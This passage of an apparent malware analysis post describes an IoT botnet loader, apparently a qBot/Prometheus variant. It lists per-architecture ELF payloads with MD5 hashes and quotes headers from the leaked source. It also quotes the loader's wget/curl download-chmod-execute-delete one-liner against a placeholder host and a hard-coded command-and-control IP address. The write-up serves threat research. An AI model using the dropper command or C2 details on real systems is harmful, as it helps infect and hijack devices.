As usual, it targets ARM-based devices and it tries to download other files (privntpd1, privsshd1, privopenssh1, privbash1, privtftp1, privwget1 etc) via curl or wget (whichever is available on the infected devices).<\/p>\n
As usual, we suspect this loader to be injected via unauthenticated telnet\/hard-coded credentials – although it could be a RCE, but we haven’t found indications about that.<\/p>\n
As soon as it finishes downloading the file, the loader changes it’s mode to executable (chmod +x privntpd1<\/strong>), runs it and then deletes it – making us suspect that this is another one that resides in the memory – probably until a reboot\/reset.<\/p>\n The priv* files that it downloads target several architectures including Intel PCs(x86\/x64):<\/p>\n privapache21: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped MD5:<\/p>\n bd52d96a2646c27ff578c9e386194c06 privapache21 Due to the fact that it uses the string “\/tmp\/yuagwduiagwdhg\/a” inside it, we think it’s another strain of qBot – or Prometheus.<\/p>\n Also, in it’s sources (that we later aquired) we could identify the following header:<\/p>\n ,<\/p>\n and a CNC server that resides at<\/p>\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://{SOMEIP}/privcron1; curl -O http://{SOMEIP}/privcron1; chmod +x privcron1; ./privcron1; rm -rf privcron1<\/pre>\n\n
\nprivbash1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
\nprivcron1: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
\nprivftp1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
\nprivntpd1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
\nprivnut1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
\nprivopenssh1: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
\nprivpftp1: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, not stripped
\nprivsh1: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
\nprivsshd1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
\nprivtftp1: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, not stripped
\nprivwget1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped<\/p>\n<\/blockquote>\n\n
\nfcae6f9865ccac9e017b662a03bb75e4 privatgodgg.sh<\/strong>
\n249516d6474ad15af5f66ae060517e88 privbash1
\n18380f4582c90a3ed6456bae480af7e1 privcron1
\naaab902c9a346d7e92fe2df6053e9034 privftp1
\n2590f61ecb53d5b0dc8d5d3c38a47430 privntpd1
\n5dfabb95131f845b6a525865c73d5a03 privnut1
\nee1cd2ee7292a0849b00438e7fd04b73 privopenssh1
\n1301bf22e80926ba6c6fc2a0f961a0a6 privpftp1
\n3a922d0203abd12cb87fac752a8456fd privsh1
\nb1a1474f1d8069fa3faf6a5fe99335a6 privsshd1
\n3eac59126a9cc85c1b66d0bc7b113104 privtftp1
\n5053e83937be0c2d72317278e097dfb9 privwget1<\/p>\n<\/blockquote>\n\r\n/*\r\n This was given to someone I considered as a good friend :/\r\n Its was being sold under my nose\r\n This was given to a friend out of a token of my graditude since he\r\n wanted to fuck over well ill just post here\r\n Shit dont work #StankyMalware #MalwareMustDie #StopHacking2017\r\n*/\r\n<\/pre>\n
\r\n/*\r\n This is the official build of PROMETHEUS\r\n ___________\r\n //LEAKED M8\\\\\r\n \\\\THIS REPS//\r\n \\\\_______//\r\n Yeah thats right this shit reps you gone be a big\r\n Goat Greper like cheats\r\n Just a lil credz to all the peeps that made this possible\r\n B1NARY\r\n ZONEHAX\r\n CHEATS\r\n Thanks to them this\r\n bot is as dank as it\r\n is XD this is the main\r\n build if you have this\r\n means you're an OG.\r\n\r\n V4 OFFICIAL FINAL BUILD\r\n Contains Multi-Threaded HTTP ATTACK\r\n Thanks for buying enjoy big boat reps\r\n This was the offical final real build\r\n of Prometheus the one that's "leaked"\r\n was the one I was selling this is the\r\n real one that I only sold to 3 people\r\n*/\r\n<\/pre>\n
\r\nunsigned char *commServer[] ={"89.34.99.131:23"}; // [N.B. not available at this time]\r\n<\/pre>\n